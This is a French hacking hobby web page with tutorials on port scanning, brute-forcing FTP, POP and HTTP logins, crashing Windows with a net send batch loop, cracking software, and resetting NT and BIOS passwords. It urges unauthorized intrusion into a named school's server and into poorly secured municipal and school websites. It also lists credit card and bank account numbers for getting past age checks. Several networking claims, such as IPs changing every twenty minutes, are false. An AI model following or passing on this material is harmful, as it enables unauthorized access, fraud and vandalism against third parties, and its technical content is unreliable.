Le site de dagost

   informatique - piratage - sécurité - musique

.:: www.dagost.org ::.

Sécurité
Piratage
Informatique
Téléchargements
Humanitaire
Anarchisme
Indépendance corse
gouvernement
Musique punk
Télévision
ping
Neuf télécom
Msn Messenger
 

About

Webmaster

Copyright

IrC

Forums

 

% Meilleur site francophone sur la sécurité relative &

 

Piratage - Hacking - études des réseaux

Page html lourde supérieure à 200Ko
[recharger]
joint l'un des plus anciens et fameux site de hack.
Astalavista VIP member
 

Irc.box.sk  #LsD

.:: sommaire : clique pour atteindre le sujet désiré ::.
accès aux partitions NT
brutus -cracker de login et de password- avec son tutorial
brute force pour POP, FTP, http etc avec proxy manager intégré
binder
codes de carte bancaire etc
cracker une archive zip ou rar protégée par mot de passe
créer un serveur FTP chez sois
créer un serveur windows HTTP, SMTP et FTP chez sois IIS
contrôler un pc distant - avec un trojan
commande dos pour killer un processus
compilateur divers
clonage de DVD protégé ou non
cookies
cracking : tools
crypt crypteurs/décrypteurs en ligne
crypteur HTML en ligne
découvrir l'adresse ip de quelqu'un, d'un site ou d'un serveur - les bases - DNS
décompiler java et flash
décompiler , modifier un exécutable - changer sa signature
empêcher l'envoi d'info à Microsoft via le registre
exploits , liste d'exploits en fonction du port à exploiter
eFnet dans le réseau IRC
éditeur hexadécimal
faille : 30000 failles détectables par 1 programme
faire une requête ping via MS DOS - tracer l'itinéraire des données émises/reçues.
faire Windows update sans se faire repéré par Microsoft
flooder un serveur web et le rendre indisponible
générateur de clé Xp et programme installateur
hacker un compte email ou netpassport (théorie) +  fakesite php & cgi
insérer un exécutable dans un fichier quelconque
keyloggers : généralités et nombreux téléchargements
lancer plusieurs sessions MSN en même temps, voir qui vous bloque...
la commande dos 'nslookup' dans l'invité de commande windows
le logiciel Ethereal analyseur de protocoles internet
le FTP - principes et astuces du protocole de transfert le plus rapide
mail bombage et spammage
md5 principe, exemples, bruteforce et crypteurs/décrypteurs en ligne
mots de passe windows -principe et piratage-
naviguer sous une fausse ip
navigateur web alternatif
nmap : avec un serveur linux scanner les ports  (aussi sous windows via un prog)
putty client SSH - information, liens, screenshot  pour premiers pas
planter windows avec netsend
programmes de hack -crack patch et générateurs
pirater un site avec un mauvais code php
passez la protection qui protège le clic droit
peer to peer crypté
pirater un site via son forum en phpBB2
pirater le bios
plantage de tout (vieux) navigateur web et donc d'OS par script java court
RIP - disquette ou cd : liens
remise en route d'un freeware
sha exemples, bruteforce et crypteurs/décrypteurs en ligne
sniffer (mail+php3)
s'introduire, faire une recherche sur un ordinateur distant
scanner l'arborescence d'un site (Intellitamper)
spammage par mail bombage
tracer l'adresse IP
trojans : généralités, pratique, soins et nombreux téléchargements
webmasters - scripts anti-pub divers selon les hébergeurs
wifi - piratage d'un réseau sans fil
 


 

.:: Les tutoriaux ::.
Utiliser Brutus : téléchargement, installation, configuration
Cracker un logiciel : comment avoir gratuitement un logiciel
Port Scan : scanner les ports d'un ordinateur
Proxy : principes et comment configurer pour naviguer par l'intermédiaire d'un proxy
Proxy2 : proxy avec proxomitron
nmap : scanner des ports
Webcam : pirater les caméras de surveillance
Virus : créer un virus personnalisé avec Nuke-gv
mail bomber : spammer avec Mailer v3
Anonymat : contrôler les cookies, son ip et les variables d'environnements


 

L'INTERNET Les pirates informatiques d'InternetCONTESTATAIRE

L'aspect militant et plutôt sympa

Le hacker militant a des principes qui président à son action:

  • - libre accès à tous les sites
  • - libre accès aux logiciels
  • - rejet de l'Internet commercial
  • - refus des extrémismes
  • - lutte contre les sites pédophiles ou néonazis
  • - liberté d'expression
  • - lutte contre la mondialisation
  • - lutte contre les multinationales
  • - lutte contre toutes les formes de dictatures
  • - défense des internautes
  • - refus de toute censure (projet Freenet) etc...
L'aspect obscur et négatif

L'activisme déborde le militantisme pur et se transforme parfois en vandalisme, saccage et pillage, en toute illégalité:

  • - Cassage des protections des logiciels
  • - Fracture des sécurités de sites sensibles
    (scientifiques, militaires ou bancaires...)
  • - Destruction ou Réécriture des pages d'un site
  • - hackers mercenaires agissant pour le compte de gouvernements à des fins politiques.
  • - Vandales qui s'attaquent à n'importe quel site
    par simple goût du graffiti et de la dégradation.
  • - Pillage de numéros de cartes bancaires stockés sur des sites marchands mal protégés...
  • - Chevaux de Troie et virus en tous genres

 

 
1.1 Généralités sur les IP

Une IP , Internet protocole, est une adresse informatique en chiffres (198.24.231.45) elle est présente chez tous les ordinateurs qui sont connectés à un réseau ou non et change tous les 20 minutes si la conexion est active (sauf 56K, freebox, demande auprès du  FAI), on parle d'IP dynamique. Sur un réseau local, l'adresse sera toujours du type: 192.168.0. suivi du numéro identifiant l'ordinateur dans le réseau  Un nom de domaine est une IP en lettre (google.fr) mais correspond à un IP en chiffre. Les serveurs qui font les liens entre nom de domaine (simple) et IP (complexe et changeantes) sont les serveurs DNS. Un programme updater de DNS est nécessaire à un serveur pour mettre à jour l'IP par rapport au nom de domaine. Les IP peuvent être suivies de :xxxx (198.24.231.45:21) ces chiffres x indiques le numéro de port, il y en a une infinités et ils sont virtuels.

1.2 Avoir l'adresse ip et avoir le ping du serveur - DNS la base

Par exemple mon lycée (La Merci qui a un site Internet : http://www.anti-lamerci.sup.fr/). Pour avoir son ip il suffit de faire une requête de ping. Ouvre MS-DOS ou un invité de commande (en étant connecté) et tape "ping lamerci.com" (sans ce qui peut suivre /images/logos/... ) tu as le ping mais aussi l'adresse ip du serveur du lycée La Merci. C'est 213.186.37.58 pour le moment il faut que le serveur soit actif , en général il l'est 24h/24 pour les serveurs http (sites internet)

Avec l'ip on a aussi l'adresse électronique exacte d'une personne il est ensuite facile de l'atteindre, le déranger est difficile et c'est là que commence le piratage. Les ip personnels, c'est à dire celles qui ne sont pas celles d'un serveur changent tous les 20 minutes et pendant la navigation.
Les serveurs de données de types DNS ont dans leur disque dur un tableau à 2 entrées : 1 les adresses ip des serveurs 2 les adresses URL. C'est grâce à eux qu'on connait l'ip grâce à un URl (http://nom_de_domaine) et c'est aussi grâce à eux que lorsqu'on tape une URL dans un navigateur on arrive sur tel site.
Une autre commande DOS 'nslookup' est intéressante regarder avant le chapitre 2.


Voici un programme pour scanner les ip par tranches, en plus tu peux faire pas mal de fonction via ce prog en plus du ping. Il s'appelle WS_ping pro hack et il est téléchargeable sur http://www.ipswitch.com/downloads/index.asp parmi la liste des autres produits de iswtch. note : c'est un freeware mais des clés circulent et sont faciles à trouver sur le net.
 

Comment trouver une ip d'un contact MSN.
tracer physiquement une ip
un programme DNS plus rapide que le ping pour avoir l'ip d'un serveur
ip sniffer en php3

Autre méthode : il faut un socket c'est à dire une connexion directe (msn : webcam ou audio ou transfert de fichier, ICQ, mIRC, serveur,etc). Il faut d'abord que tu ouvres une fenêtre dos (pour l'invité de commande tape 'cmd' dans executer), dans la fenêtre dos tu tapes netstat, tu repères la personne est le port qu'elle a ouvert par exemple: abcdef aol.com:6667, ensuite netstat -n pour avoir toutes les ip connectées à ton pc (on peut voir ceux qui bloquent) tu regardes le port ouvert ex:abcdef aol.com:6667 (6667 étant le port ouvert dans l'exemple) et tu repères l'ip attachée au port. Bon moi perso je propose le logiciel éthéreal (téléchargeable de mon site) qui est beaucoup mieux voir 6 et o peut savoir qui bloque ou est hors ligne. Attention avec les nouvelles versions de MSN l'ip du serveur MSN s'affiche aussi si tu n'as pas une conexion directe.
Tu peux après avoir fait le netstat tracer la connexion et se renseigner sur l'itinéraire prit part tes données avec la commande DOS 'tracert' de syntaxe 'tracert'espace 'ip' (attention aux firewall qui bloquent cette commande)

pour les mails : les mails envoyés par pop3  possèdent dans leur entête caché l'adresse ip du pc serveur qui a envoyé le mail et l'ip de l'envoyeur. Attention l'ip change souvent. Par défaut les boites mails n'affichent pas ces informations mais on peut généralement le demander dans les options. [pour hotmail] ci-dessous ce qu'affiche la messagerie hotmail :
 

1. ... ip personnel du posteur
2. ... adresse d'envoie du message
3. ... adresse qui relaie le message (généralement la même que celle qui envoie)
4. ... adresse de réponse (généralement la même que celle qui envoie ou relaie le message)
5. ... option pour afficher le code html du mail et un éventuel code caché

1.3 La commande DOS 'nslookup'

elle permet d'interroger un serveur DNS afin d'obtenir les informations concernant un domaine ou un hôte et permet ainsi de diagnostiquer les éventuels problèmes de configuration du DNS. Invoqué sans argument, la commande nslookup affiche le nom et l'adresse IP du serveur de noms primaire et affiche une invite de commande pour l'interrogation. Il suffit de taper le nom d'un domaine à l'invite afin d'en afficher les caractéristiques. Il est également possible de demander les informations sur un hôte en indiquant son nom à la suite de la commande nslookup :

nslookup host.name

Par défaut la commande nslookup interroge le serveur de noms primaire configuré sur la machine. Il est toutefois possible d'interroger un serveur de noms spécifique en le spécifiant à la suite de la commande précédé du signe "-" :

 

 

nslookup host.name -serveur.de.nom


Il est possible de modifier le mode d'interrogation de la commande nslookup grâce à la clause set :

  • set type=mx permet de recueillir les informations concernant le ou les serveurs de messagerie d’un domaine.
  • set type=ns permet de recueillir les informations concernant le serveur de noms associé au domaine
  • set type=a permet de recueillir les informations concernant un hôte du réseau. Il s'agit du mode d'interrogation par défaut.
  • set type=soa permet d'afficher les informations du champ SOA (Start Of Authority).
  • set type=cname permet d'afficher les informations concernant les alias.
  • set type=hinfo permet, lorsque ces données sont renseignées, d'afficher les informations concernant le matériel et le système d'exploitation de l'hôte.
Pour sortir de la commande nslookup, il suffit de taper exit.

1.4 Adresse réseau MAC

Il s'agit des adresses physiques des cartes adaptateurs. Ces adresses sont codés en 48 bits par les constructeurs de matériels réseau. Il est important de comprendre qu'une adresse MAC est totalement d'une adresse IP car elle est unique, autrement dit elle restera la même jusqu'à la fin de sa vie, et par la suite, aucun ordinateur ne pourra la réutiliser !

Les adresses sur 48 bits sont uniques : l' IEEE attribue à chaque constructeur un numéro (6 chiffres hexadécimaux) spécifique. Le constructeur gère ensuite lui-même les autres bits disponibles de l'adresse. Ainsi, quel que soit l'origine du matériel, il n'y à pas de conflit d'adresses physiques possible sur le réseau.

 

2. Vérifier qu'un le port est ouvert

il faut qu'avec un serveur linux ou un autre logiciel tu te connecte sur l'ip serveur de la merci, en bash c'est à dire via un serveur linux tape "# nmap ip_a_scanner" en windows c'est du DOS standard mais il n'y pas de possibilités suffisante pour du piratage ou même de l'étude de réseau avec scannage des ports.
Tu as le numéro des ports et leur état. bien sur il y a 400 façons de voir l'état des ports certains sites public le proposent. De mon site tu peux télécharger PortScan :

Téléchargements :
Portscan (.rar)   voir le tutorial de port scan new
nmap pour windows (600Ko .zip v3.93)
Tutorial : avoir un serveur ssh, s'en servir pour faire des nmap

3. Le vif du sujet  -Putty- client SSH

Bon bref passons à Putty, munis toi de l'adresse IP du serveur à pénétrer . Clique ici pour ouvrir la page putty ensuite tu cliques sur la version qui t'intéresse par exemple xp en haut à gauche tu fais EXÉCUTER OU OUVRIR mais pas enregistrer. Putty s'ouvre tape l'adresse ip ou l'URL (nom_su_serveur.com). La fenêtre putty s'ouvre si le port choisit est ouvert et là plusieurs commande sont faisables mais avant tout il faut comprendre le principe de putty. Le client (toi) utilise un protocole ssh pour aller sur le serveur hote qui lui utilise un protocole sshd, le premier S voulant dire secure (sécurisé) donc il y a un login (nom d'utilisateur) et un password (mot de passe) donc il faut savoir les login et les passwords des administrateurs pour avoir les pleins pouvoirs et après c'est comme si t'étais sur place. Ce mot de passe et ce login peuvent être trouver avec des logiciel comme Brutus téléchargeable de ce site.

. télécharger putty et winPcap

4. Commande principales des consoles
 

SOUS LINUX SOUS WINDOWS COMMENTAIRES
    -BASH-    -MS DOS-  noms du langage
cd cd permet de naviguer dans les dossiers
ls dir affiche les directory
cp copy copie des fichiers (to = vers)
mv move déplacer des fichiers
mkdir mkdir créer une nouvelle directorie
rm erase / del supprime
     

5. exemple

clique ici pour observer un imprimé de mon écran qui t'expliquera mieux

6. Le logiciel Ethereal, base de toutes études de réseaux

Son nom vient d'Ethernet, le port de ta carte réseau et real qui signifie réel. En fait ce logiciel a de nombreuses utilités dont la principale est de voir tout ce qui passe via ta connexion, les ip plus ou moins complexes, le protocole Internet et les détails maximums. Tu testes ainsi ton firewall et peux voir si quelqu'un t'en veux ! Il nécessite le petit programme WinPcap pour fonctionner. Tu peux télécharger Ethereal et WinPcap en cliquant ici et voir des imprimés d'écran en cliquant là ou encore lire le manuel d'aide. Si tu es connecté via un modem qui fait firewall (ex: wanadoo livebox) les ip donnés peuvent être faussées. Ethereal s'utilise pour étudier le réseau et ainsi (par exemple) voir qui vous bloque sur msn...

télécharger Ethereal et WinPcap

7. Hack via FTP

Le FTP est un protocole de transfert mais on parle aussi de FTP pour un espace en ligne où les sites web sont stockés. Après putty et le ssh via le port 22, il existe le FTP (file transport protocole) qui passe par les ports 20 et 21. C'est le moyen de transfert le plus simple et le plus rapide. Il est pratique car si tu essayes de te connecter via ftp sur un serveur mal configuré tu connais déjà le mot de passe et le login. En effet si il est mal configuré il accepte les utilisateurs anonyme donc le login est "anonymous" et il n'y a pas de mot de passe ou alors c'est 'anonymous'. Le mieux est d'avoir le login administrateur et ainsi avoir les pleins pouvoirs bien qu'ils soient limitées par le peu d'instruction que le FTP comporte. Internet explorer traite le ftp, on dit qu'il est client FTP et sous MS-DOS les principales commandes sont put, get , open. Tape help pour avoir la liste des commandes. Attention il faut d'abord dire que tu veux utiliser ftp, tape juste ftp puis entrer. Cette méthode est nettement moins bien et n'est pas considérée comme du Hacking. Internet Explorer 6 n'est pas génial pour le FTP mais est largement suffisant.
Imagine que brutus (voir plus haut) te trouve le login et le mot de passe d'un FTP d'un site... c'est la fête. Ici le FTP est un espace de donnée stocké sur un serveur où le siteweb ou des données sont enregistrés. Tu peux donc modifié un siteweb, il y a pas si longtemps on pouvait facilement le faire pour les sites des mairies, des écoles, ...

8. petite liste de protocoles Internet

Samba    (windows)
ssh      (secure serveur host)
ftp       (file transport protocole - le plus rapide)
Ping      (pour avoirs le temps de réponse du serveur en ms)
X-Window  (linux ou windows)
VNC      (utilitaire de commande à distance)
http      (pages internet)
https    (pages internet cryptées)
telnet     (prise de contrôle à distance windows pas très sécurisé)
mms     (données sécurisée)
 

9. faire planter Windows avec netsend [Hack léger]

J'ai lu cette idée sur http://www.projectnews.fr/ un site mignon avec un bon forum. Je l'ai un peu modifié mais merci malgré qu'elle ne marche pas avec les systèmes d'exploitation récents.


On va créer un petit programme en .bat tout con qui se chargera d'expédier les message dès que vous cliquerez dessus et ainsi saturer windows. Voici la procédure:

1)Ouvre le bloc note, notepad voir word
2)Tape la ligne suivante:  net send 81.52.234.58 salut!
(mettez l'ip de l'ordinateur a attaqué a la place de 81.52.234.58 et le message que vous voulez a la place de salut! )
3) send.bat (send.bat est le nom du prog à appeller)
4) maintenant va falloir enregistrer ton mini programme DOS en .bat
-va dans enregistrer sous
-nom du fichier send.bat par exemple
Au lieu d'appeller un prog externe on peut aussi faire une boucle. NETSEND est un SERVICE windows qui peut être désactiver. Pour plus d'informations va voir dans les astuces d'informatique en cliquant ici
 

10. site de hack en ligne

Tu as besoin d'une clé pour un logiciel, même récent, ou encore un générateur de clé? Tu as peut-être besoin d'un crack no-cd ? Un seul site pour faire efficacement ce genre de recherche, un peu plus haut se trouve la astalavista box  c'est le moteur de recherche de crack, de patch et de sérials le plus important au monde , en effet depuis peu tu peux faire ce genre de recherche directement du site de dagost : [lien]


 

11. programmes de crack

un crack ou un patch est un fichier qui remplace le point exe de lancement ou pré enregistre des clé dans le setup par exemple. Un générateur génère des clés. Oscar est un générateur de générateur de clé.

Des logiciels existants sont des bases de données de numéros de série et de générateur de clé mais aussi de patch no cd. Voir de cartes de crédits mais là je ne suis plus d'accord. Voici une liste et les liens. Ces programmes sont évidements illégaux et simples à avoir c'est que du texte et des mises à jours annuelles à récupérées !
 

noms adresses internet (url)   logo  
Sérial2K http://www.serialz.to/s2kupdates.html
Oscar EFnet demande la Oscar Team
Antares Email  sinwolf@usa.net
sérial 99 cachée il faut passé par IRC puis EFnet

IRC ?

au travers du réseau IRC. Un serveur peut être connecté à plusieurs serveurs et maintenir des centaines de clients. Le plus large, appelé EFnet (Eris Free net), sert plus de 15000 utilisateurs à n'importe quel moment donné. Les plus petits, comme IRCNet (10000), Undernet (10000) et Dalnet (8000) sont secondaires. mIRC est un service de chat légal ou il y a moyen de trouver des hacker susceptibles de te donner accès aux site de piratage temporaires cachés, depuis quelques années le niveau baisse... Il est facile de se créer un serveur IRC.

12. problèmes liés à des sites à restrictions

Certains sites nécessitent la preuve que vous êtes majeurs pour pouvoir commercialisé ou juste montrer son contenu.
La preuve est en générale la possession d'une vrai carte de crédit.

Eurocard France :

 5130 0916 7342 5873
 5130 4146 6084 9972
 5130 0301 1656 3650
 5130 9848 0001 0784
 5130 0275 4937 4820
 5130 3149 5179 5001
 5130 1974 9103 1403
 5130 8317 5424 3269

Visa citibank :

 4013 8325 4108 9838
 4013 1810 1327 0793
 4013 0569 7525 8525
 4013 4948 5624 7392
 4013 9327 3723 6258
 4013 6657 5370 3534
 4013 6042 9684 1311
 4013 3773 9549 3793

Numéro de comptes bancaires :

B.N.P :

No de banque :    No Guichet:         No de compte :    clé de RIB:

30004                     05623                     94955664872         63

Autre :

No de banque :    No Guichet:         No de compte :    clé de RIB:

44295                     15857                     00966926809         22

70195                     14880                     38801927592         97

12260                     86002                     03744600026         89

13. Réinitialisez vos mots de passe NT


Avec un ordinateur, on rencontre souvent des situations où toutes les méthodes traditionnelles de dépannage semblent inefficaces ou inappropriées. C’est précisément la passion des hackers que de trouver des solutions, le plus souvent élégantes, à des problèmes réels alors impossibles à résoudre. On va voir dans l’exemple de cet article que des outils qui ne pourraient servir, au premier abord, qu’à des pirates peuvent se révéler salvateurs, dans des conditions légitimes et pas si rares que ça.

13.1 Hashage et mots de passe NT

Aucun système d’exploitation moderne ne stocke plus de mot de passe en clair, c'est-à-dire en toutes lettres, tel que l’utilisateur doit le taper. Il existe des méthodes mathématiques qui permettent de coder un mot de passe de manière irréversible. On entend par là qu’il n’est pas possible de reconstituer le mot de passe à partir de sa version codée. Pour être plus exact, on peut dire qu’il est infiniment plus difficile de décoder que de coder, dans la mesure où il faudrait un nombre astronomique d’heures de calcul pour le faire.
On peut alors se demander comment le système peut valider un mot de passe alors qu’il n’en connaît qu’une forme codée. En fait ce sont les résultats du codage qui sont comparés. Pour se faire une idée du genre du genre de procédé dont il s’agit on peut prendre comme exemple le codage rudimentaire suivant : multiplier le numéro des lettres du mot de passe. Le mot de passe ABCD deviendrait alors 1 x 2 x 3 x 4 = 24. PASSWORD deviendrait 16 x 1 x 19 x 19 x 23 x 15 x18 x 4 = 143475840. Ainsi si l’utilisateur tape ABCD au lieu de PASSWORD, le système s’en rendra compte en voyant que 24 est différent de la valeur 143475840 inscrite pour cet utilisateur.
Ce type de codage présente cependant de nombreux défauts. D’une part le calcul ne permet pas de distinguer les anagrammes (WORDPASS donne aussi 143475840). D’autre part la transformation n’est pas irréversible : il est possible d’énumérer facilement toutes les combinaisons de multiplications dont le résultat est un nombre donné en le factorisant, donc de trouver tous les mots de passe valides.
Les systèmes d’exploitation font plutôt appel à des fonctions cryptographiques beaucoup plus solides. Windows NT utilise notamment la fonction de hashage MD4 qui permet de transformer une chaîne de caractères de longueur quelconque en un mot de taille fixe (128 bits). Ce hash est stoqué pour chaque mot de passe dans une partie de la base de registres, stockée dans un fichier baptisé SAM (pour Security Accounts Manager).

13.2 Pour accéder aux partitions NT

L’idée est la suivante : remplacer le « hash » de l’Administrateur par celui d’un mot de passe que l’on aura choisi. Pour réaliser cette opération presque chirurgicale, il nous faut l’accès en écriture au système de fichiers de NT (NTFS). on pourait brancher le disque dur sur un autre système capable d’y accéder, par exemple un autre poste Windows NT. mais cependant je préfère ne pas rentrer dans les détails.
evidement nous disposons d’un lecteur de disquettes (le lecteur CD-ROM pouvant aussi faire l’affaire), nous avons plutôt choisit une solution qui tire profit de ce périphérique. Il existe en effet des systèmes d’exploitation qui tiennent sur une disquette et qui permettent des prouesses. En particulier, il existe des mini-distributions de GNU/Linux qui contiennent la majorité des outils dont on aurait besoin pour récupérer un système en panne. C'est pas mal de cherché une solution de ce type parce que Linux intègre depuis pas mal de temps des drivers pour NTFS.

RIP

RIP (pour Rescue Is Possible :) ) est un système Linux spécialement conçu pour les coups durs et qui tient sur une disquette (il existe une version CD-ROM). Il suffit de faire booter l’ordinateur depuis le lecteur de disquette pour obtenir un système GNU/Linux de base duquel on peut lancer, par ligne de commande, une série d’outils qui permettent de réparer, analyser ou sauvegarder le système préexistant. RIP permet de manipuler les données contenues sur le disque dur et sait interpréter tous les systèmes de fichiers usuels. On peut l’utiliser, par exemple, pour récupérer des fichiers importants sur un disque dur partiellement endommagé et les graver sur un CD de sauvegarde.
aide : qu'est ce qu'une disquette de boot ?
 

13.4 Retrouver le mot de passe BIOS

RIP comprend également un outils fort intéressant qui sait déchiffrer le mot de passe de la plus part des BIOS. Contrairement à ce que l’on a dit des systèmes d’exploitation, le BIOS mémorise les mots de passe de manière réversible. L’auteur de cet outil a rassemblé (ou reconstitué) les algorithmes d’un grand nombre de marques. Le programme les applique systématiquement à la mémoire du BIOS.
On voit apparaître le mot de passe (WEAK !) dans l’exemple qui suit, encore une fois vive Linux.


# cmospwd

CmosPwd – BIOS Cracker 4.3, 16 June 2003,
Copyright 1996-2003
GRENIER Christophe, grenier@cgsecurity.org
http://www.cgsecurity.org

Keyboard : US
Acer/IBM................................[ ]
AMI BIOS...............................[I %5]
AMI WinBIOS (12/15/93)..........[ EAK!]
AMI WinBIOS 2.5....................[WEAK!] [ ] [* ]
AMI ?....................................[ ] [Y] [ ] [0]
Award 4.5x/6.0.......................[2213] [21322030] [000100]
[...]


Ce type de programme sait également décoder les mots de passe de certains BIOS de Compaq, Phoenix, Gateway, Toshiba, IBM, Thinkpad et quelques autres. Il est aussi possible de faire des copies de sauvegarde du BIOS, ou d’en effacer complètement la mémoire. Bien entendu, comme il faut au moins démarrer sur le lecteur de disquette pour utiliser ce programme, il n’est pas possible de décoder le mot de passe BIOS s’il est demandé au démarrage de l’ordinateur. Dans ce cas de figure, la solution la plus simple consiste à débrancher la pile qui alimente la mémoire BIOS. Il s’agit d’une petite pile plate, ronde, clipsée sur la carte mère. Nous avons tenté l’expérience avec notre AMI WinBIOS et nous avons pu observer que ce BIOS, lorsque la pile est absente, propose de rétablir les paramètres par défaut (sans mot de passe ce qui est rare). Une fois la pile remise en place, l’ordinateur a continué de fonctionner correctement, la protection en moins.

Solution clé en main

Un dernier outil proposé par RIP a finalement attire l'attention : chntpw. Ses fonctionnalités correspondent exactement à ce que jev voulais vous montrer plus haut, à savoir modifier le fichier SAM pour remplacer le hash des mots de passe que l’on veut réinitialiser. il y cependant à une limite majeure de RIP : la version de Linux qui en est le moteur ne permet l’accès à NTFS qu’en lecture. on peut donc modifier une copie du fichier SAM, mais pas la substituer au fichier original.
Il faut donc fabriquer une disquette (floppy) bootable qui contient une version récente de Linux capable d’accéder en écriture (write) à une partition NTFS. Il fallait également qu’elle contienne le programme chntpw. Google te désigne une page qui nous a permis d’aboutir (l’adresse du site est donné à la fin de l’article). Il s’agit aussi d’une mini-distribution, mais cette fois focalisée sur les mots de passe NT. Contrairement à RIP, il n’est pas nécessaire de taper de commandes, seulement de répondre à des questions (avec des réponses par défaut entre crochets, qui sont proposée à partir d’un diagnostic système).
La première étape est de copier l’image de la disquette sur son support physique. On trouve dans la rubrique Download de la page, la disquette (archive bd030426.zip, dernière version en date) et l’utilitaire (rawrite2.zip) qui permet de la copier. Si tous les fichiers sont dans le même répertoire, cette commande DOS transfère l’image sur une disquette insérée au préalable :

C: tpasswd) rawrite2.exe –f bd030426.bin –d A:


Une fois que l’ordinateur a démarré sur le lecteur de disquette et que Linux est chargé, un script prend la relève et assiste l’utilisateur. Une première question concerne les interfaces SCSI. On peut répondre « n » (si NT est installé sur un disque SCSI, il faut encore télécharger une autre disquette, sc030426.zip). Ensuite, une liste des partitions disponibles apparaît. Le script choisis pour nous la première partition de boot NT. Au menu suivant, on choisit de changer des mots de passe (par défaut).
Avant de lancer chntpw, le script s’inquiète encore du chemin du fichier SAM. il faut parfois intervenir ici, parce que le chemin par défaut (winnt/system32/config) correspond à NT, et non à Windows 2000 (windows/system32/config).
Après une ou deux autres réponses par défaut (Enter), on se retrouve dans le programme chntpw. Il suffit de choisir un utilisateur puis de lui donner un nouveau mot de passe, comme on le voit ici :


Username to change ( ! to quit, . to list users): [Administrateur]
RID : 0500 [01f4]
Username: Administrateur
fullname : Administrateur
comment : Compte mis à niveau depuis Windows 95 ou Windows 98
homedir :


Crypted NT pw: 01 00 01 00 01 9f e4 0f 94 c5 2b 4a c8 49 8e 83
Crypted LM pw: 01 00 01 00 49 e5 7a b4 72 0c 2b 76 c8 71 fc 22
MD4 hash : d0 51 37 f2 02 7f dc b8 8e 7e 90 31 bf 62 e5 23
LANMAN hash : d3 7a 2e fe 5d 1f 57 32 cc 6e 92 cb 58 39 10 8b


Please enter new password
or nothing to leave unchanged: nouveau


NEW MD4 hash : c3 16 4e 9e 17 7e a6 cc 80 5a 4a 53 a2 d5 79 76
NEW LANMAN hash: 78 5b 76 91 07 0d 26 3a aa d3 b4 35 b5 14 04 ee
NEW DES crypt : 10 5d 0c bf 24 86 bb 65 a3 e2 f2 85 2a b9 42 d4
NEW LANMAN crypt: c1 95 2c 26 2d a1 db bf 3a 0f 64 36 af f3 88 1f


Une fois sorti de chntpw, le script demande une double confirmation avant d’écraser l’ancien fichier SAM par le nouveau. En suivant cette démarche, nous avons pu nous identifier sans encombre, lorsque nous avons redémarré Windows 2000.

Mais les pirates ?
Nous avons montrés qu’il était possible, sans connaissances particulières, si l’on possède les bons outils, d’accéder au compte administrateur d’un poste NT. Nous avons réellement contourné le système de sécurité, en utilisant les périphériques de l’ordinateur sans le contrôle de NT. La technologie des ordinateurs personnels ne permet généralement pas au système d’exploitation d’empêcher ce genre d’intervention.
Pourtant, il faut réaliser que ce que nous avons fait, une personne malveillante peut le faire en quelques minutes sur un ordinateur qui ne lui appartient pas. On s’étonne donc pas que les serveur importants sont le plus souvent sous clé. Et c’est peut-être aussi une bonne raison de se méfier des malins qui rôdent autour de son ordinateur.


Sites Internet [en anglais] Tous les outils présentés sont des logiciels libres :

       
RIP :       http://www.tux.org/pub/people/kent-robotti/looplinux/rip/

cmospwd :   http://www.cgsecurity.org/cmospwd.html

chntpw :     http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

Offline NT Password & Registry Editor : http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html



17. informations sur les ports - Le logiciel PortScan - clique ici

14. cracker des login et des mdp Ð

La brute force est la méthode la plus courante pour trouver un nom d'utilisateur (login) et le mot de passe qui lui correspond. La vrai brute force consiste à tester toutes les possibilités possibles mais en général on se tient à une attaque par dictionnaire, c'est à dire à partir d'une liste de mot de passe potentiels. Il y a deux choses importantes à savoir pour être efficace : Avoir une bonne liste de mots de passe potentiels et avoir plusieurs bandes passantes pour être plus efficaces s'il s'agit d'une brute force.
Les meilleurs programmes de brute force sont ceux en ligne de commande parce qu'on peut les appeler d'un serveur distant.
syntaxe standard : protocole://login:password@serveur.ext:port/répertoire/

Brutus est un logiciel qui teste des possibilités de login et de mot de passe pour tenter de trouver les bons pour quelques protocoles, Il est l'exemple type du programme bien fait mais inefficace sans quelques modifications. En effet il test différentes possibilités à partir d'une liste de mots stockée en .txt (dico) qui est intéressante mais souvent non adaptée. Mais Brutus, comme il est bien fait te propose de tester les possibilités à partir de tes propres fichiers textes! Donc si tu adaptes ta "wordlists" liste de mots et tes "words" mots de passe éventuel au type de hack que tu souhaite le hack est rapide et efficace. Attention néanmoins aux timeout de configuration de certains serveurs.
Télécharge Brutus en cliquant ici. Nouveau : le tutorial de brutus
Pour ceux qui n'aiment pas Brutus, et il y a de nombreuses raisons à cela, je mais à votre disposition VcrackFTP, il est semblable a brutus mais est très simple, ne brute que le protocole ftp et utilise des dictionnaires en .txt.
Télécharge VcrackFTP et ses listes de password (.rar 496Ko)

ibrute forcer pour formulaire http, htaccess et pop : wwwhack.exe : cliquez ici
ibrute forcer pour SMB (netbios) : • SMBcrack (en ligne de commande) 25Ko
 

15. Empêcher l'envoi d'info à Microsoft sous XP

Lorsque Internet Explorer ou un autre programme provoque une erreur système, il envoie à Microsoft des informations concernant cette erreur via le programme docteur watson (drwtsn.exe)
Pour des raisons de confidentialité, si tu ne souhaites pas informer Microsoft de ta configuration logicielle et matérielle il faut, pour cela, éditer la base des registres (regedit) puis te rendre à la clé :
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain
Si la valeur IEWatsonDisabled n'existe pas, créez-la. Cliquez sur le menu EditionNouveau, Valeur DWORD.
nomme cette valeur IEWatsonDisabled.
Double clique dessus, puis saisis 0 dans le champ Données de la valeur. Ferme la base de registres pour valider les changements.
 

16. Tracer une IP

Linux et Windows intègre la commande 'tracer' qui permet de tracer une adresse ip (cf: nslookup, ssh )

Les ip peuvent changent souvent au cours des heures à part pour les malchanceux à ip fixe.
elles sont plus ou moins distribués aléatoirement. C'est à dire qu'avec un programme on peut facilement voir ou est situé l'ordinateur de cette ip. AW IP locator est un petit logiciel que tu peux télécharger de ce site et qui te permettra de trouver le pays, la région et la ville de son propriétaire mais aussi son ip de départ et de retour.

AW IP locator
D'autres programmes permettent de tracer une ip et de montrer les étapes géographiquement : • Neo tracer Pro 1.8Mo .zip
On peut aussi trouver le FAI d'une Ip.

17. Pirater un site avec un mauvais code php/html du style URL=...

Cette technique rare, basée sur le dynamisme du php qui contient le site, fonctionne de moins en moins mais permet à quelqu'un qui maîtrise un minimum l'informatique de bien faire chier un webmaster mauvais en programmation. C'est un coup de bol si tu en connais un, cette technique est presque impossible de nos jours, mais si ça marche...

